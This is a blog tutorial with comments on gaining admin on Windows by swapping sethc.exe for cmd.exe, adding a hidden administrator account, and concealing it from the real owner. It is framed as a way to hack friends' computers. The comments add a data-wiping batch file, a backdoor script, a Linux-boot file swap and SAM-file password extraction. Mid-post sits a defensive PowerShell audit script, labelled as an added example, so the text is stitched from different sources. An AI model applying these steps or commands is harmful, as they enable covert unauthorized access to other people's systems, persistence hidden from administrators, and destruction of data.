Gain admin access on Windows using your guest account

Hello All,

Ever thought of how to get into your friend’s system and see the access-denied files and folders? Or ever wanted to hack into someone’s admin account? Well, here is a method which exploits yet another Windows bug.

  1. Have you ever noticed that if you press your system’s SHIFT key >= 5 times in a row, a pop-up window named “Sticky Keys” appears? If it doesn’t pop up on your computer, the shortcut is probably turned off. To enable it, go to Control Panel -> Accessibility Options. In Accessibility Options, under the Keyboard tab, in Sticky Keys, click Settings and enable the shortcut for Sticky Keys. You can do this even from a guest account.
  2. Finally, if the following two requirements are met on your system, you are all set to enter your admin’s account:
  • On pressing SHIFT >= 5 times, a pop-up should appear.
  • The Windows System32 directory should be writable.

When you press the SHIFT key >= 5 times, a file named “sethc.exe” is executed. You can verify this in Task Manager (don’t close the pop-up window). This file is located in the C:\WINDOWS\system32 folder, or wherever your Windows is installed.

[Screenshot: Gain admin access on windows system using your guest account]

The Vulnerability

  1. When the SHIFT key is pressed >= 5 times, Windows executes a file named “sethc.exe” located in the system32 folder. It doesn’t even check whether it is the genuine file. Also, it runs with the privilege of the CURRENT USER who is executing it, i.e. if you have logged on as a guest, then in Task Manager under Processes it shows your user name as guest.
  2. The file executes even if you log off and are sitting at the Windows login screen.

If you understand this much, then the exploitation is very simple. What we will do is pick cmd.exe, copy it to a folder other than system32 (because Windows won’t allow you to copy in place), rename it to sethc.exe, go to the system32 folder, and paste it. Windows will ask “another file exists, do you want to replace it?” and after pressing OK you have replaced sethc.exe with your own cmd.exe. Now if you press the SHIFT key >= 5 times, a command prompt will open instead of the Sticky Keys dialog.


  1. Now log off or restart. When you reach the Windows login screen, press the SHIFT key >= 5 times. A command prompt will pop up with SYSTEM privilege.
  2. Enter the normal commands as follows (the second command is net localgroup, not net user localgroup, as corrected in the comments below):
     net user username /add
     net localgroup administrators username /add
  3. A new user called username with admin privilege will be added.

And that’s it: you have admin privilege on the system and you can do whatever you want with it.

Hiding your fake admin profile
Now you surely don’t want the real admin to track you. Here is what you will have to do to hide yourself from the login screen as well as from Control Panel:

  1. Go to the Registry Editor and open this key:
  2. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
  3. Here create a new DWORD value and give it the name of the “user name” that you created for your admin account.

That’s it; now you are invisible but still admin of the system. Live as admin forever and keep screwing the real admin forever.
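For the administrator on the other side of this post, here is a check that looks for the three things the technique depends on: a swapped sethc.exe, a System32 directory writable by non-administrators, and accounts hidden through the SpecialAccounts\UserList key described above. This is an added example, not code from the original post or its comments; it assumes Windows PowerShell 5.1 or later run from an elevated prompt, and that a genuine sethc.exe carries “sethc.exe” as the OriginalFilename in its version resource.

```powershell
# Added defensive check (not part of the original post). Assumes an elevated
# Windows PowerShell 5.1+ session; all paths and key names are the standard
# ones the post itself refers to.

$system32 = Join-Path $env:SystemRoot 'System32'
$sethc    = Join-Path $system32 'sethc.exe'
$cmd      = Join-Path $system32 'cmd.exe'

# 1. Has sethc.exe been swapped for another binary? Two independent tells:
#    its hash equals cmd.exe's, or its version resource no longer says
#    OriginalFilename "sethc.exe" (assumption about the genuine file).
$sethcInfo = (Get-Item $sethc).VersionInfo
$sethcHash = (Get-FileHash -Algorithm SHA256 $sethc).Hash
$cmdHash   = (Get-FileHash -Algorithm SHA256 $cmd).Hash
if ($sethcHash -eq $cmdHash -or $sethcInfo.OriginalFilename -ne 'sethc.exe') {
    Write-Warning "sethc.exe does not look genuine (OriginalFilename='$($sethcInfo.OriginalFilename)', SHA256=$sethcHash)"
}

# 2. Can non-administrators write into System32 (the post's first requirement)?
#    Report any Allow ACE granting Write/Modify/FullControl to a principal
#    outside the expected privileged set. Generic rights show up as negative
#    ints in FileSystemRights, so compare on the raw integer mask.
$trusted   = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl
(Get-Acl $system32).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0) -and
        ($_.IdentityReference.Value -notin $trusted)
    } |
    ForEach-Object {
        Write-Warning "System32 writable by $($_.IdentityReference): $($_.FileSystemRights)"
    }

# 3. Accounts hidden from the logon screen / Control Panel. Any value under
#    UserList is a name that was deliberately hidden; 0 hides it from the
#    welcome screen, 0x10000 also hides it from Control Panel (per the
#    comments on this post).
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    (Get-ItemProperty $userList).PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS' } |
        ForEach-Object { Write-Warning "Hidden account entry: $($_.Name) = $($_.Value)" }
}

# 4. Finally, list who currently sits in the local Administrators group so an
#    unexpected member added via "net localgroup" stands out.
Get-LocalGroupMember -Group 'Administrators' |
    Select-Object Name, ObjectClass, PrincipalSource
```

Running this periodically (or at logon via a scheduled task) turns the post’s two “requirements” into audit findings: a non-trusted principal with write access on System32 is the misconfiguration to fix, and a mismatched sethc.exe or an unexpected UserList entry is the evidence that someone already used it.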


Last but not least (IMPORTANT)
Windows has two types of login screens:

  1. Where the accounts are listed with pictures.
  2. Where you have to type a username and password.

After making the hidden account you will have to log in through the 2nd type only. If your login screen is of Type 1, press CTRL-ALT-DEL twice to get the 2nd type of screen.

That’s it!!!

This is a sure-shot way to gain admin; if you are a lamer or a newbie, then please do some googling. I have written almost every detail.

Thanks for reading this far 🙂 Make a comment if you liked this one.

Thanks for digging and shouting it out to your friends.


  1. truly

    nice one, but I already knew this stuff 😀. It would be nice and more interesting if you got into .bat files; they are nice and you can help people make their own virus. I tried a few on my system and ended up at a position where FORMAT was the only solution 😛

  2. Hi Truly,

    First of all thanks for your comment.

    Well, .bat files are not the best way to do it. What I have described here is a clean and neat process. Tried it several times on my system with no problem whatsoever. Do give it a try in your free time and I’m sure this won’t force you to re-format.

  3. aah… cool, will surely try to find a hack using them, though there exist a lot using them.

    Why don’t you chip in with a few posts if you have any idea of how to use these .bat files to gain such admin access? I will acknowledge you for the same 😛

  4. truly

    I have made a couple of bat files but I think no one wants to try them because of the result, you know, and they were not for hacking into accounts, rather they were meant to be used to fuck the data 😀 which I tried and yes I got fucked, so if you want I can write a post and tell people how to go ahead with this 😛

  5. truly

    yeah very true


    ECHO This is a batch file
    DEL PATH*.*
    FORMAT E: /U


  6. Pingback: Huge windows vulnerability

  7. Indrajeet

    It’s quite surprising that a guest will have write permissions to the System32 folder, and that too to overwrite an already existing command, because the paste function is invoked with guest privileges. I don’t have a Windows machine here but would have loved to try this out and have a nice laugh at Windows security.

  8. Yes as I said the two requirements for this to succeed are that:

    1. System32 is writable
    2. Sticky keys enabled

    I have the snapshots above which I have copied from the trackback link to this blog post. Enjoy !

  9. tushar ..

    Awesome, man, jhantu and truly …
    didn’t know this stuff ……
    or even thought about it ,,
    all I knew was one thing: while playing, if
    sticky keys were kept on, the rest of the game was
    surely screwed !!!!!!!

  10. matthews

    truly, you should make a .bat that installs SP3, Firefox and AVG, removes malware etc. Then we would have a quick technician script you can run as admin without hassling the user, and we can have it delete the account when it’s done. Hack your way to security.

  11. matthews

    @admin I’ve been a Linux user for a while. Mint is good if your hardware is supported. I dual booted for a year but I don’t want Vista on my new machine and the price of XP was outrageous. At any rate I find Linux usable, but the thing I miss most is the software aisle.

  12. Well, I use Windows XP on one of my laptops and Vista on the other. I must confess both suck, but they still make day-to-day life easy. Regarding Linux, I use Ubuntu in VMware on Windows itself. Plus all my web servers are Linux, hence I do enjoy Linux too…..

    But I understand the software aisle you are talking about.

  13. zeebo

    I’m confused about finding a cmd.exe and copying it without finding it in the system32 folder. I can’t find it anywhere else. Can anyone tell me how to do it? Sorry for the newb question 🙂

  14. Didn’t you find it in your system32 folder? It’s in the system32 folder for all Windows versions as far as I know.


    Put the above in your browser and it will prompt you for saving the same. Save it on your desktop, make the necessary changes and hurray 😉

  15. Robbie Mosaic Fan

    Ah… Yes, I use this exploit to play with my computer (and once a computer in the university lab). Also, the way to prevent this exploit is to use NTFS and not allow normal users to modify executable files, especially those used by Administrators.

  16. First of all thanks a lot sree for the comments, that will satisfy a few of the above commenters.

    @jon, well I guess Sree’s comment will satisfy your question (wtf 😉)

    However I do agree that in an office it’s unlikely that you will get system32 writable, but then use this trick to hack your friend’s computer if not the office one. You will be able to do all this on personal computers where they really don’t care to make system32 unwritable.

  17. noone

    Problem: guest accounts are disabled in WinXP. The Users and Power Users groups only have read and execute privileges. As with EVERY tutorial about gaining system or admin access, this one is no different: if there are no privileges to modify, then you cannot apply any workaround. This is a neat trick, but of course you have to have the modify attribute set in the group that your login is assigned to.

  18. Well, I don’t think it is possible unless your guest account has the required privilege. I used this technique generally on my friends’ computers where I am already logged in as admin. I set the whole thing up and then simply try it out later when he is not there 😛

    If you are trying to hack through your Computer Center or something of the sort, I am afraid that you can’t make system32 writable from a guest account.

  19. FrereOP

    You can gain access to the Windows System account (higher up than Administrator), then use this account to change the read/write privileges in the System32 directory. Be careful, as the System account is the equivalent of a LINUX root account and you can easily stuff your system! Presumably you could also add users from here, but the less you use this account the better!

    Search Google to find out how to gain access to the System account using the “at” command.

  20. anarchist

    Ahoy! I have the same problem. The message what I get says:
    Cannot copy sethc.exe: Access is denied.

    Make sure the disk is not full or write-protected and that the file is not currently in use.

  21. FrereOP

    Accounts with “User” privileges (including the Guest account) do not have write access to System32, and some programs (execute privileges) are disabled as well, including the “at” command, which is the key to getting to the System account. This will give an “Access is Denied” error.

    However, accounts with “Power User” privileges do have execute access and will work.

  22. FrereOP

    If you are really stuck (you have a User rather than a Power User or Administrator account), then resort to LINUX for help. If you can boot a LINUX live CD such as Ubuntu, you can do it in situ. If booting from a CD has been disabled in the BIOS you may be able to re-enable it, but if the BIOS is locked as well and you can’t, you will have to physically move the hard disk to another machine that can boot from a CD.
    Use the LINUX distro to do the replacement of sethc.exe with cmd.exe in the system32 directory. A LINUX root account will not honour the ownership privileges of your NTFS disk, although it may honour the read-write/read-only status of the file.

  23. linuser

    thanks everyone for their tips.
    Abhinav, man, can you please share how you got this webpage…. I mean, are you hosting on your own computer or on another server?

    I am planning a webpage but not getting a head start…. 🙁

  24. XP USER

    I tried to do all that you gave me, but the sethc.exe I replaced with cmd.exe after renaming failed to work. When I restarted the machine, the cmd prompt at the logon screen said “the syntax of this command is NET USER” and failed to work.

  25. Needshelp

    it’s not letting me copy sethc (cmd) to system32: it says: Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use. Please help me out.

  26. ZAC

    ok so when I go into system32 and find the file it says “sethc” only, there is no “.exe” at the end. So do I just rename the cmd file as just “sethc” or am I screwed? Please respond asap, ty 🙂

  27. Pingback: How to hack administrator password from GUEST account

  28. Jack

    Hey, I tested this out on my computer and once I copy the cmd.exe to another folder and rename it, it won’t let me place it in the system32 folder and says I need administrator access for that. Is there a way to circumvent this access request, or did they fix this Windows bug? Any help you can give me would be greatly appreciated.

  29. Hi Friends,
    Nice Post,I am also interested in learning
    ethical hacking and finding out the security loopholes in OS,network and fixing them up. I recently did a course on ethical hacking from, this course gave me detailed insight of hacking,learning and training. I would recommend to do this course for everyone interested in networking security and ethical hacking. They also run linux,java courses and also have online and distance learning program.


  30. Vikash

    Man, please help me, it cannot replace. How to fix this? Please help, it’s urgent: “Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use”

    please help anyone

  31. Shashikant


    “What we will do is that,
    we pick cmd.exe , copy it at a folder other than system32, (because windows
    won’t allow u to copy) rename it to sethc.exe, go to system32 folder,
    and paste it. Windows will ask, “that another file exists, do u want to
    replace?” and after pressing OK, you have replaced the sethc.exe with ur own
    cmd.exe. ”

    How can I copy and replace the sethc.exe after renaming cmd.exe to sethc.exe in the Windows\system32 directory as a guest?
    It says “Access is denied”.

  32. akil

    hey buddy, don’t mess up everybody. System32 isn’t writeable from a guest account. If you have privileges to change System32 to being writeable, you already have admin access, so wtf is the point of this? jon is absolutely correct, the trick is clear and good but of no use. You can’t even perform it with power users; I tried it, anybody will get a message like access denied….
    don’t waste time, go find another place…..

  33. john

    Very cool. Just have a small query.. if I add files to the guest account, do they automatically get added to the admin a/c as well? Do they get deleted when I delete them from the guest a/c?

    1. Kevin

      If I wanted to remove the cmd shortcut so that any trace of tampering could be removed, could i just replace the cmd (renamed sethc.exe) with the original sethc.exe which I copied onto my flash drive? After i created a new admin, of course 🙂

    2. Bat file for making backdoor
      cd windows
      cd system32
      copy cmd.exe d:
      ren cmd.exe sethc.exe
      cd windows
      cd system32
      ren sethc.exe my.exe
      copy sethc.exe C:WindowsSystem32
      @echo Backdoor have been Created
      @echo You can change it By command as – NET USER *

      now save it as .bat extension and it will make a backdoor on ur xp logon screen by just press shift 5 times…

  34. MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    You can download this bootable ISO (only 3 MB, it’s zipped).. create a bootable USB drive (you can use Unetbootin or YUMI), boot via it and clear the administrator password from the computer you wanna use, and abracadabra! No password needed to log in to admin.. you can access anything you want

  36. MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    You can download this bootable ISO, it’s only 3 MB, then create a bootable USB drive (you can use Unetbootin or YUMI), boot via it and clear the administrator password from the computer you wanna use, and abracadabra! No password needed to log in to admin.. you can access anything you want

  37. Mr.Singh

    The information provided by you is really interesting and new for me, but there is one problem that came in front of me when I tried to change the administrator password using a guest account. When I logged in using a guest account, the SYSTEM32 folder becomes read only and Windows doesn’t allow me to make any changes in the system32 folder, due to which I cannot replace the SCTCH.EXE file.

    Please reply to me with the solution: what can I do to change the password of admin using a guest account, as SYSTEM32 is read only.

    Thanks in advance

  38. et phone home

    this hack does not work for computers with high security. I tried every way to get the files to go into system32 but get access denied for copying, WTF. Apparently the admins know of this hack and have protected the computers; the sethc.exe does not even show up in system32, I had to search for it.

  39. Hello, this hack is too old now and you should update it.. and also, only few systems would allow Guest accounts to overwrite system32 files…
    you can try this …

    1. Download Ubuntu or any linux with GUI (for noob purposes) Ubuntu 11.04 or 10.04 would do.
    2. Install it on a USB thumb drive using either unetbootin or universal installer from pendrivelinux
    3. boot from the USB drive
    4. a window would ask you if you want to install ubuntu or try it. select try it.
    5. goto HOME folder.
    6. in the upper left side of the window, you could see Mounted drives, select the first drive in the list. take note, it would have an icon of a hard drive.
    7. double click that.
    8. if you saw a folder named Windows, that’s the drive we want, if not, try the others in the list.
    9. in the drive we selected, GOTO Windows > System32
    10. now find CMD.exe, copy it and paste it on the desktop, rename it SETHC.exe
    11. then drag the renamed CMD.exe from the desktop to the folder System32. You would be asked if you want to overwrite the existing SETHC.exe; click Yes to confirm.
    12. Reboot. The hack would now be possible.

    you can press the shift key, 5 times to bring out the Command prompt

    (this would only possible if you successfully followed what i have said earlier. IT’S 100% WORKING, TRIED AND TESTED ON DIFFERENT SYSTEMS, INCLUDING NETWORKED COMPUTERS FROM COLLEGE UNIVERSITIES) ^_^ thankx

  40. Omega.

    Hey all of you,
    First of all the system file doesn’t get replaced. Someone help me with [email protected]. As you asked what message comes, here is some info about that: it says access is denied, the file is being used by someone else. That’s what comes. Please help me.

  41. noob

    when I tried to copy the sethc.exe into system32 it said I needed the admin password, which is a real problem for me because I am only doing this cuz I changed my password a while ago and forgot what it was, so I need to use “net user administration *” to change my password

  42. prakash

    just follow MullahCrazedNiccuh’s idea of booting Linux from USB and copy the SAM file (the file where Windows stores all users’ passwords) located in windows\system32\config. Copy it, paste it anywhere, e.g. a pendrive. Open the SAM file after you reboot the computer, then you will find a long code and you can google how to decode it into plain text….

    1. Aniruddh Agarwal

      Worked like a charm with the Linux method! My little brother forgot the password of the only account of his PC, but fortunately he still had a guest account with which I activated Sticky Keys. The rest was done by Linux!

  43. Diell Morina

    Hey, everything’s good, but I can’t turn on the fuckin sticky keys!! I can’t change it by Ease of Access nor by Narrator before loggin’ in (when you have to choose which user you want to log in). When I turn it on from Ease of Access it doesn’t do anything, even though I press sticky keys like 1000000000 times. Also when I try to do it by the Ease of Access (narrator thingy) before loggin’ in, it pops up a message “error starting sound agent. There may be no sounds for FilterKeys or StickyKeys”, and doesn’t let me press OK and change the pass’.

    Please help!

  44. Verity

    Hey, I’m trying this because I forgot my admin password and my guest account doesn’t let me download anything. I’ve done everything, but the last couple of steps aren’t working. I’ve typed “net user username/add” and entered, and then “net user localgroup administrators username/add”, but no new user has been added? :| help

  45. Bob

    A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn’t reinstall the OS. ………….
    However, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows password instantly yet no data loss.

  46. Jonathan Cauthorn

    Correction to this step:
    net user localgroup administrators username /add
    should remove the “user” and should read:
    net localgroup administrators username /add

    Simple typo.

  47. Nurul Hidayati

    okay, i’m having this problem
    I have a computer but the admin is my brother, he put parental control that only allows me to open my pc for few hours and then it locked by itself years ago and still don’t want to give me his password. I can’t do anything with this PC, from downloading games, songs and videos from Internet to even copy and paste my documents. I can’t even do anything with it and just even thinking of it makes me want to smash it to pieces. Is there any ways to remove my brother’s admin password or account without using Password Reset CD or USB drive, I mean just from the guest account. I know just from the sound of it, is quite impossible but please help. I don’t want to reboot or anything

  48. Kitale Nudeet


    Apr 09, 2014

    the “renaming” way on the 1st method doesn’t work and most of people see this too!

    “Cannot move sethc.exe(to System32): Acess is denied
    Make sure the disk is not full or write-protected
    and that the file is not currently in use.”

    But I know how to fix this!

    1. Turn on the Computer then force it to turn off.

    2. Turn it on again and it will ask you to launch “Safe Mode”, “Safe Mode with Networking”, “Safe Mode with Command Prompt” and “Start Windows Normally”. Choose “Start Windows Normally”. Then quickly hit “Ctrl+Alt+Delete” and the system will restart.

    3. It will have only two choice for you to choose is
    “Launch Startup Repair” and “Start Windows Normally”. Now choose “Launch Startup Repair”.

    4. Wait for Windows’s stuff to load and a dialog will pop up to ask you something like this: “Do you want to restore your computer using system restore?” Choose Cancel. A bit later another dialog will pop up saying “Startup repair cannot repair this computer automatically”. If this doesn’t pop up, do steps 2, 3, 4 again.

    5. The dialog will ask you to “Send information about this problem”, “Don’t send”, and the important part is “View problem details”. So of course, click on the drop down in front of “View problem details” and scroll down to the bottom part; there is a local link similar to this “C:/Windows/System32/en-US/erofflps.txt”. Click on it.

    6. Bang!! It opens up a text document in Notepad. (It’s more and more exciting.) Click “File” then “Open”, or just press “Ctrl+O”, and it is a file explorer!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    7. Locate the folder C:/Windows/System32 and find cmd.exe, but you actually can’t find it! Why?!!! Oh no! Don’t worry, bloodstriker can help you. Look at the bottom of the file explorer, there is a dropdown list called “Files Type”. Change it to “All Files”. Now copy and paste “cmd.exe”. Rename “sethc.exe” to anything you want and rename “cmd – Copy.exe” to “sethc.exe”.

    8. Happy ending: click “Cancel”, next close Notepad, then click “Don’t Send” and click “Finish”. The system will restart; do steps 5-9 in this tutorial and Bravo!!


  49. Jonathan Cauthorn

    Correct Registry key:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

    “The value of 0 hides the user account from the welcome screen. However the user account is still visible under the control panel. The value of 1 shows the user on the welcome screen. The last possible values is 65536 (0x10000). That value hides the user account as well from the welcome screen as well as from the control panel.” – Norbert Willhelm

  50. snipe

    …except the guest account can’t replace or rename, OR delete files in the system32 folder, nor can they write to the registry. So this entire tutorial is pointless.

    also it’s spelled ‘you’ not ‘u’

  51. Cam Wirtz-Fielding

    ah, Windows 7 was so exploitable. Admin and school laptops almost all now use Windows 10, and the school IT departments are usually pretty damn smart nowadays. I remember when I gained access to system32 a couple of years ago on Windows 10, and I was about to create a new profile, however it denied access. They’ve upped their game. Quite tricky to bypass this shit nowadays.
